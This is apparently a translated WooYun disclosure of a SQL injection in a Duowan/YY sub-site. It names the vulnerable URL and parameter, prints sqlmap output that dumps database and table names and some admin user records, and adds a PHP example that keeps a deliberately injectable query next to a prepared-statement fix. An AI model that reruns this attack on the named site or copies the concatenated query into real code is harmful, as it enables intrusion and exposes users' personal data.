Vulnerability Summary (Followers: 24)
Defect ID: wooyun-2015-0162007
Title: GET-type SQL injection in a major Duowan sub-site
Vendor: Guangzhou Duowan (广州多玩)
Author: 路人甲
Submitted: 2015-12-17 09:23
Fix time: 2015-12-22 09:24
Published: 2015-12-22 09:24
Type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: vendor notified, but the vendor ignored the vulnerability
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2015-12-17: details sent to the vendor, awaiting vendor handling
2015-12-22: vendor actively ignored the vulnerability; details disclosed to the public
Brief description:
SQL injection in a sub-site, reachable through a GET parameter
Detailed description:
URL: http://hdzx.g.yy.com/activitysys/detail?act=peiwan (the injection is in the GET request; `act` is the only query-string parameter, and the sqlmap output below was taken against this URL)
[17:22:03] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[INFO] fetching database names
[INFO] the SQL query used returns 3 entries
[INFO] retrieved: "information_schema"
[INFO] retrieved: "auditdb"
[INFO] retrieved: "hd"
available databases [3]:
[*] auditdb
[*] hd
[*] information_schema
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[17:36:21] [INFO] fetching current database
[17:36:22] [WARNING] reflective value(s) found and filtering out
current database: 'hd'
Now try dumping the hd database (the one the application currently uses):
[08:23:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.11
[08:23:10] [INFO] fetching tables for database: 'hd'
[08:23:11] [INFO] the SQL query used returns 170 entries
[08:23:11] [INFO] retrieved: "100_admin"
[08:23:11] [INFO] retrieved: "100_courses"
[08:23:11] [INFO] retrieved: "100_lesson"
[08:23:12] [INFO] retrieved: "100_operator"
[08:23:12] [INFO] retrieved: "100_regist"
[08:23:12] [INFO] retrieved: "100_sell"
[08:23:12] [INFO] retrieved: "100_student"
[08:23:13] [INFO] retrieved: "100_study_his"
[08:23:13] [INFO] retrieved: "100_teacher"
[08:23:13] [INFO] retrieved: "Award"
[08:23:13] [INFO] retrieved: "AwardPool"
[08:23:14] [INFO] retrieved: "AwardPool_game"
[08:23:41] [INFO] retrieved: "AwardPool_tanabata"
[08:23:43] [INFO] retrieved: "Award_game"
[08:23:43] [INFO] retrieved: "Award_tanabata"
[08:23:43] [INFO] retrieved: "ExchangePool"
[08:23:43] [INFO] retrieved: "act_module"
[08:23:44] [INFO] retrieved: "act_page"
[08:23:44] [INFO] retrieved: "act_user"
[08:23:44] [INFO] retrieved: "activity"
[08:23:44] [INFO] retrieved: "activity_metas"
[08:23:45] [INFO] retrieved: "award_qualification"
[08:23:45] [INFO] retrieved: "award_qualification_moon"
[08:23:45] [INFO] retrieved: "award_quote"
[08:23:45] [INFO] retrieved: "bao_xiang"
[08:23:46] [INFO] retrieved: "baoming"
[08:23:46] [INFO] retrieved: "baoming_yyuid"
[08:23:46] [INFO] retrieved: "bind"
[08:23:46] [INFO] retrieved: "book_notify_record"
[08:23:47] [INFO] retrieved: "book_notify_record_tanabata"
[08:23:47] [INFO] retrieved: "broadcast_award_info"
[08:23:47] [INFO] retrieved: "channel_blacklist"
[08:23:47] [INFO] retrieved: "channel_blacklist_in"
[08:23:48] [INFO] retrieved: "channel_state"
[08:23:48] [INFO] retrieved: "choujiang_times"
[08:23:48] [INFO] retrieved: "demon_game"
[08:23:48] [INFO] retrieved: "error_record"
[08:23:49] [INFO] retrieved: "error_record_"
[08:23:49] [INFO] retrieved: "error_record_moon"
[08:23:49] [INFO] retrieved: "event"
[08:23:49] [INFO] retrieved: "exchange"
[08:23:50] [INFO] retrieved: "exchange_pool"
[08:23:50] [INFO] retrieved: "exchange_qualification"
[08:23:50] [INFO] retrieved: "exchange_qualification_"
[08:23:50] [INFO] retrieved: "exchange_quote"
[08:23:51] [INFO] retrieved: "exchange_type"
[08:23:51] [INFO] retrieved: "game_team_fix"
[08:23:51] [INFO] retrieved: "game_team_fix_27"
[08:23:51] [INFO] retrieved: "gyy_index"
[08:23:52] [INFO] retrieved: "kickout_member_fix"
[08:23:52] [INFO] retrieved: "kickout_member_fix_27"
[08:23:52] [INFO] retrieved: "mon_refresh"
[08:23:52] [INFO] retrieved: "monster_record"
[08:23:53] [INFO] retrieved: "monsters"
[08:23:53] [INFO] retrieved: "my_activity"
[08:23:53] [INFO] retrieved: "notification"
[08:23:54] [INFO] retrieved: "notify_test"
[08:23:54] [INFO] retrieved: "order_list"
[08:23:54] [INFO] retrieved: "order_ret_list"
[08:23:54] [INFO] retrieved: "other_notify"
[08:23:55] [INFO] retrieved: "other_notify_tmp2"
[08:23:55] [INFO] retrieved: "ow_notify"
[08:23:55] [INFO] retrieved: "ow_notify_tanabata"
[08:23:55] [INFO] retrieved: "participant_blacklist"
[08:23:56] [INFO] retrieved: "participant_blacklist_in"
[08:23:56] [INFO] retrieved: "participant_earth_day"
[08:23:56] [INFO] retrieved: "phone_passport"
[08:23:56] [INFO] retrieved: "pos"
[08:23:57] [INFO] retrieved: "product_list"
[08:23:57] [INFO] retrieved: "product_order_list"
[08:23:57] [INFO] retrieved: "product_order_ret"
[08:23:58] [INFO] retrieved: "questions"
[08:23:58] [INFO] retrieved: "ranking_cake"
[08:23:58] [INFO] retrieved: "ranking_cake_tmp"
[08:23:59] [INFO] retrieved: "ranking_channel"
[08:23:59] [INFO] retrieved: "ranking_channel_tmp"
[08:23:59] [INFO] retrieved: "ranking_daily_score"
[08:23:59] [INFO] retrieved: "ranking_daily_score_chibi"
[08:24:00] [INFO] retrieved: "ranking_daily_score_datang"
[08:24:00] [INFO] retrieved: "ranking_daily_score_jianghu"
[08:24:00] [INFO] retrieved: "ranking_daily_score_lianzhan"
[08:24:00] [INFO] retrieved: "ranking_daily_score_lingyu"
[08:24:01] [INFO] retrieved: "ranking_daily_score_lingyu2"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moxia"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moxia_copy"
[08:24:01] [INFO] retrieved: "ranking_daily_score_moyu"
[08:24:02] [INFO] retrieved: "ranking_daily_score_msanguo"
[08:24:02] [INFO] retrieved: "ranking_daily_score_tianxia3"
[08:24:02] [INFO] retrieved: "ranking_daily_score_wendao2"
[08:24:03] [INFO] retrieved: "ranking_daily_score_wuhun"
[08:24:03] [INFO] retrieved: "ranking_daily_score_xiyou2"
[08:24:03] [INFO] retrieved: "ranking_daily_score_xiyou3"
[08:24:03] [INFO] retrieved: "ranking_daily_score_youhun"
[08:24:03] [INFO] retrieved: "ranking_daily_score_zhanshen"
[08:24:04] [INFO] retrieved: "ranking_daily_score_zhengtu2"
[08:24:04] [INFO] retrieved: "ranking_list_earth_day"
[08:24:04] [INFO] retrieved: "ranking_list_earth_day_20130427_backup"
[08:24:04] [INFO] retrieved: "ranking_win"
[08:24:05] [INFO] retrieved: "ranking_win_tmp"
[08:24:05] [INFO] retrieved: "reg_temp"
[08:24:05] [INFO] retrieved: "reg_temp2"
[08:24:05] [INFO] retrieved: "registration_yy_chibi"
[08:24:06] [INFO] retrieved: "registration_yy_datang"
[08:24:06] [INFO] retrieved: "registration_yy_jianghu"
[08:24:06] [INFO] retrieved: "registration_yy_lianzhan"
[08:24:07] [INFO] retrieved: "registration_yy_lingyu"
[08:24:07] [INFO] retrieved: "registration_yy_lingyu2"
[08:24:07] [INFO] retrieved: "registration_yy_moxia"
[08:24:08] [INFO] retrieved: "registration_yy_moxia_copy"
[08:24:08] [INFO] retrieved: "registration_yy_moyu"
[08:24:08] [INFO] retrieved: "registration_yy_moyu_copy1"
[08:24:08] [INFO] retrieved: "registration_yy_msanguo"
[08:24:09] [INFO] retrieved: "registration_yy_qingdian"
[08:24:09] [INFO] retrieved: "registration_yy_tianxia3"
[08:24:09] [INFO] retrieved: "registration_yy_tx2014"
[08:24:10] [INFO] retrieved: "registration_yy_tx2014_tmp"
[08:24:10] [INFO] retrieved: "registration_yy_wendao2"
[08:24:10] [INFO] retrieved: "registration_yy_wuhun"
[08:24:10] [INFO] retrieved: "registration_yy_xiyou2"
[08:24:11] [INFO] retrieved: "registration_yy_xiyou3"
[08:24:11] [INFO] retrieved: "registration_yy_zhanshen"
[08:24:11] [INFO] retrieved: "registration_yy_zhengtu2"
[08:24:12] [INFO] retrieved: "registration_yy_zhengtu2_copy"
[08:24:12] [INFO] retrieved: "score_earth_day"
[08:24:12] [INFO] retrieved: "score_tmp"
[08:24:12] [INFO] retrieved: "security_code"
[08:24:14] [INFO] retrieved: "security_code_push"
[08:24:15] [INFO] retrieved: "sys_msg_tasks"
[08:24:15] [INFO] retrieved: "t1"
[08:24:15] [INFO] retrieved: "t2"
[08:24:17] [INFO] retrieved: "t_campus_phone_message"
[08:24:17] [INFO] retrieved: "t_campus_phone_message2"
[08:24:17] [INFO] retrieved: "t_mid_autumn_ans"
[08:24:18] [INFO] retrieved: "t_mid_autumn_user_medal"
[08:24:18] [INFO] retrieved: "t_mid_autumn_user_medal2"
[08:24:18] [INFO] retrieved: "t_question_game_equipment"
[08:24:19] [INFO] retrieved: "t_question_game_name"
[08:24:19] [INFO] retrieved: "t_question_user_select"
[08:24:19] [INFO] retrieved: "t_question_user_suggestion"
[08:24:19] [INFO] retrieved: "team_member_fix"
[08:24:20] [INFO] retrieved: "team_member_fix_27"
[08:24:20] [INFO] retrieved: "temp_activity"
[08:24:20] [INFO] retrieved: "tmp_need_bind"
[08:24:20] [INFO] retrieved: "tmp_need_bind_2"
[08:24:21] [INFO] retrieved: "toefl_exam"
[08:24:21] [INFO] retrieved: "tx2014_act_info_t"
[08:24:21] [INFO] retrieved: "tx2014_drop_diamond_t"
[08:24:21] [INFO] retrieved: "tx2014_game_info_t"
[08:24:22] [INFO] retrieved: "tx2014_miner_info_t"
[08:24:22] [INFO] retrieved: "tx2014_mining_cfg_t"
[08:24:22] [INFO] retrieved: "tx2014_stone_cfg_t"
[08:24:22] [INFO] retrieved: "tx2014_stone_exchange_t"
[08:24:23] [INFO] retrieved: "user_blacklist"
[08:24:23] [INFO] retrieved: "user_blacklist_in"
[08:24:23] [INFO] retrieved: "user_notify"
[08:24:23] [INFO] retrieved: "user_notify_alibaba"
[08:24:24] [INFO] retrieved: "user_notify_tanabata"
[08:24:24] [INFO] retrieved: "user_reg_yy_teach_11"
[08:24:24] [INFO] retrieved: "vip_auth_code"
[08:24:24] [INFO] retrieved: "wg_user_record"
[08:24:25] [INFO] retrieved: "yy_admin"
[08:24:25] [INFO] retrieved: "yy_operator"
[08:24:25] [INFO] retrieved: "yy_question"
[08:24:25] [INFO] retrieved: "yy_question_reply"
[08:24:26] [INFO] retrieved: "yy_student"
[08:24:30] [INFO] retrieved: "yy_teacher"
[08:24:31] [INFO] retrieved: "yyno_login"
[08:24:31] [INFO] retrieved: "yypush_test"
[08:24:31] [INFO] retrieved: "yyuid_temp"
[08:24:31] [INFO] retrieved: "zijin_vote"
[08:24:31] [INFO] fetching columns for table '100_admin' in database 'hd'
[08:24:33] [INFO] the SQL query used returns 23 entries
[08:24:33] [INFO] retrieved: "yyuid","int(10)"
[08:24:33] [INFO] retrieved: "name","varchar(20)"
[08:24:34] [INFO] retrieved: "sex","varchar(5)"
[08:24:34] [INFO] retrieved: "birthday","date"
[08:24:34] [INFO] retrieved: "id_card","varchar(50)"
[08:24:39] [INFO] retrieved: "nationality","varchar(50)"
[08:24:40] [INFO] retrieved: "resident","varchar(50)"
[08:24:40] [INFO] retrieved: "phone1","varchar(50)"
[08:24:40] [INFO] retrieved: "phone2","varchar(50)"
[08:24:40] [INFO] retrieved: "e_mail","varchar(50)"
[08:24:41] [INFO] retrieved: "address","varchar(100)"
[08:24:41] [INFO] retrieved: "qq","varchar(20)"
[08:24:43] [INFO] retrieved: "weixin","varchar(50)"
[08:24:44] [INFO] retrieved: "tencent_weibo","varchar(50)"
[08:24:44] [INFO] retrieved: "sina_weibo","varchar(50)"
[08:24:44] [INFO] retrieved: "served_inc","varchar(50)"
[08:24:44] [INFO] retrieved: "good_at","varchar(50)"
[08:24:45] [INFO] retrieved: "intro","varchar(250)"
[08:24:45] [INFO] retrieved: "video_url","varchar(250)"
[08:24:45] [INFO] retrieved: "create_time","datetime"
[08:24:46] [INFO] retrieved: "last_update_time","datetime"
[08:24:46] [INFO] retrieved: "operator","int(10)"
[08:24:46] [INFO] retrieved: "admin_type","int(5)"
[08:24:46] [INFO] fetching entries for table '100_admin' in database 'hd'
[08:24:47] [INFO] the SQL query used returns 4 entries
[08:24:47] [INFO] retrieved: "","4","1980-01-01","2013-12-06 16:29:12","","",...
[08:24:47] [INFO] retrieved: "","4","1980-01-01","2013-12-13 09:57:49","","",...
[08:24:48] [INFO] retrieved: "6","4","0000-00-01","0000-00-00 00:00:00","5","...
[08:24:48] [INFO] retrieved: "","4","1980-01-01","2013-12-06 16:28:38","","",...
[08:24:48] [INFO] analyzing table dump for possible password hashes
Database: hd
Table: 100_admin
[4 entries]
[08:24:48] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
(shown transposed, one dumped row per column; six cells of row 1 were lost when the console wrapped the original 23-column table and are marked "(missing)")
+------------------+---------------------+---------------------+---------------------+---------------------+
| column           | row 1               | row 2               | row 3               | row 4               |
+------------------+---------------------+---------------------+---------------------+---------------------+
| yyuid            | ??                  | 50001932            | 50012755            | 50013440            |
| id_card          | <blank>             | <blank>             | aa                  | <blank>             |
| resident         | <blank>             | <blank>             | 2                   | <blank>             |
| video_url        | <blank>             | <blank>             | 17f                 | <blank>             |
| qq               | <blank>             | <blank>             | 7                   | <blank>             |
| sex              | <blank>             | <blank>             | ?                   | <blank>             |
| name             | <blank>             | calen               | ?                   | DinDinHo            |
| intro            | <blank>             | <blank>             | fffff               | <blank>             |
| weixin           | (missing)           | <blank>             | 9                   | <blank>             |
| phone2           | (missing)           | <blank>             | 4                   | <blank>             |
| phone1           | (missing)           | <blank>             | 3                   | <blank>             |
| e_mail           | (missing)           | <blank>             | 5                   | <blank>             |
| good_at          | (missing)           | <blank>             | 3                   | <blank>             |
| address          | (missing)           | <blank>             | 6                   | <blank>             |
| operator         | 50012755            | 50012755            | 0                   | 50012755            |
| birthday         | 1980-01-01          | 1980-01-01          | 0000-00-01          | 1980-01-01          |
| sina_weibo       | <blank>             | <blank>             | f                   | <blank>             |
| served_inc       | <blank>             | <blank>             | b                   | <blank>             |
| admin_type       | 4                   | 4                   | 4                   | 4                   |
| create_time      | 2013-12-06 16:29:12 | 2013-12-13 09:57:49 | 0000-00-00 00:00:00 | 2013-12-06 16:28:38 |
| nationality      | ??                  | ??                  | 1                   | ??                  |
| tencent_weibo    | <blank>             | <blank>             | 0                   | <blank>             |
| last_update_time | 2013-12-06 16:29:12 | 2013-12-13 09:57:49 | 2013-12-06 16:27:45 | 2013-12-06 16:28:38 |
+------------------+---------------------+---------------------+---------------------+---------------------+
[08:24:48] [INFO] table 'hd.100_admin' dumped to CSV file 'C:\Python27\sqlmap\output\hdzx.g.yy.com\dump\hd\100_admin.csv'
[08:24:48] [INFO] fetching columns for table '100_courses' in database 'hd'
[08:24:48] [INFO] the SQL query used returns 14 entries
[08:24:49] [INFO] retrieved: "course_id","int(10) unsigned"
[08:24:49] [INFO] retrieved: "course_name","varchar(50)"
[08:24:49] [INFO] retrieved: "course_content","varchar(250)"
[08:24:49] [INFO] retrieved: "course_hour","varchar(100)"
[08:24:50] [INFO] retrieved: "create_time","datetime"
[08:24:50] [INFO] retrieved: "course_price","varchar(50)"
[08:24:50] [INFO] retrieved: "course_discount","varchar(10)"
[08:24:50] [INFO] retrieved: "course_picture_url","varchar(250)"
[08:24:51] [INFO] retrieved: "course_video_url","varchar(250)"
[08:24:51] [INFO] retrieved: "sell_begin","datetime"
[08:24:51] [INFO] retrieved: "sell_end","datetime"
[08:24:51] [INFO] retrieved: "teacher","varchar(50)"
[08:24:52] [INFO] retrieved: "operator","int(11)"
[08:24:52] [INFO] retrieved: "last_update_time","timestamp"
[08:24:55] [INFO] fetching entries for table '100_courses' in database 'hd'
Database: hd
Table: 100_courses
[0 entries]
Columns (in dump order): course_id | course_video_url | teacher | sell_end | operator | sell_begin | course_name | create_time | course_hour | course_price | course_content | course_discount | last_update_time | course_picture_url
[08:24:55] [INFO] table 'hd.100_courses' dumped to CSV file 'C:\Python27\sqlmap\output\hdzx.g.yy.com\dump\hd\100_courses.csv'
[08:24:55] [INFO] fetching columns for table '100_lesson' in database 'hd'
[08:24:56] [INFO] the SQL query used returns 10 entries
[08:25:26] [INFO] retrieved: "course_id","int(11)"
[08:25:26] [INFO] retrieved: "lesson_id","int(11)"
[08:25:26] [INFO] retrieved: "lesson_name","varchar(50)"
[08:25:27] [INFO] retrieved: "lesson_content","varchar(250)"
[08:25:27] [INFO] retrieved: "lesson_time","datetime"
[08:25:27] [INFO] retrieved: "channel_id","int(11)"
[08:25:36] [INFO] retrieved: "teacher_id","int(11)"
[08:25:36] [INFO] retrieved: "create_time","datetime"
[08:25:36] [INFO] retrieved: "operator","int(11)"
...
There is much more, including some sensitive data (the 100_admin columns above already hold national ID numbers, phone numbers, addresses and messaging handles), so I will stop here.
Asking for a gift, please! Thanks! (*^__^*)
Proof of vulnerability:
As above.
Fix recommendation:
Filter the input; more robustly, pass `act` to the database as a bound parameter instead of concatenating it into the SQL text, so that quoting in the statement is never under the client's control.
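The vulnerable and the fixed form of the lookup, side by side. This is an added example, not code from the original report or from Duowan's application: the real query behind /activitysys/detail is not shown on the page, so the table name `activity`, its `act` and `title` columns, the function names and the probe string are all assumptions. It uses an in-memory SQLite database through PDO so that it runs stand-alone; against MySQL the only change is the DSN.

```php
<?php
// Added example, not the report's or Duowan's code. Assumed schema: a table
// `activity` with columns `act` and `title`. SQLite in memory so it runs offline;
// for MySQL use e.g. new PDO('mysql:host=127.0.0.1;dbname=hd;charset=utf8mb4', $u, $p)
// and also set PDO::ATTR_EMULATE_PREPARES to false so the server binds the values.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE activity (act TEXT PRIMARY KEY, title TEXT)');
// Constructed sample rows; the slug names are taken from the report's URL and table list.
$db->exec("INSERT INTO activity VALUES ('peiwan', 'peiwan activity'), ('tanabata', 'tanabata activity')");

// Vulnerable pattern: the GET value is spliced into the SQL text, so the quoting of
// the statement belongs to whoever controls the parameter. This is the shape of
// bug sqlmap exploits; it is kept here deliberately for comparison.
function detailVulnerable(PDO $db, $act)
{
    $sql = "SELECT act, title FROM activity WHERE act = '" . $act . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed pattern: a prepared statement with a bound parameter. The value travels
// separately from the query text and cannot alter the statement's structure.
function detailSafe(PDO $db, $act)
{
    $stmt = $db->prepare('SELECT act, title FROM activity WHERE act = :act');
    $stmt->execute(array(':act' => $act));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth: `act` is an activity slug, so an allowlist on its shape is cheap
// and rejects anything containing quotes or spaces before it reaches the database.
// The character set and length are assumptions about what a slug may contain.
function validActSlug($act)
{
    return (bool) preg_match('/\A[a-z0-9_]{1,32}\z/', $act);
}

// Constructed probe input (not a payload from the report): a closing quote plus an
// always-true clause, the textbook shape of a string-context injection.
$probe = "peiwan' OR '1'='1";

echo 'vulnerable: ' . count(detailVulnerable($db, $probe)) . " rows\n"; // 2 rows: the WHERE clause was rewritten
echo 'prepared:   ' . count(detailSafe($db, $probe)) . " rows\n";       // 0 rows: the probe is just an unmatched string
echo 'allowlist:  ' . (validActSlug($probe) ? 'accepted' : 'rejected') . "\n"; // rejected
echo 'allowlist:  ' . (validActSlug('peiwan') ? 'accepted' : 'rejected') . "\n"; // accepted
```

The allowlist is a cheap first gate, not the fix: escaping or filtering can be bypassed by encoding tricks or by a later code change that feeds a different value into the same query, whereas a bound parameter stays safe whatever the value contains.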
Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)
Vulnerability Response
Vendor response:
Severity: No impact, vendor ignored
Ignored at: 2015-12-22 09:24
Vendor reply:
Vulnerability Rank: 15 (WooYun rating)
Latest status:
None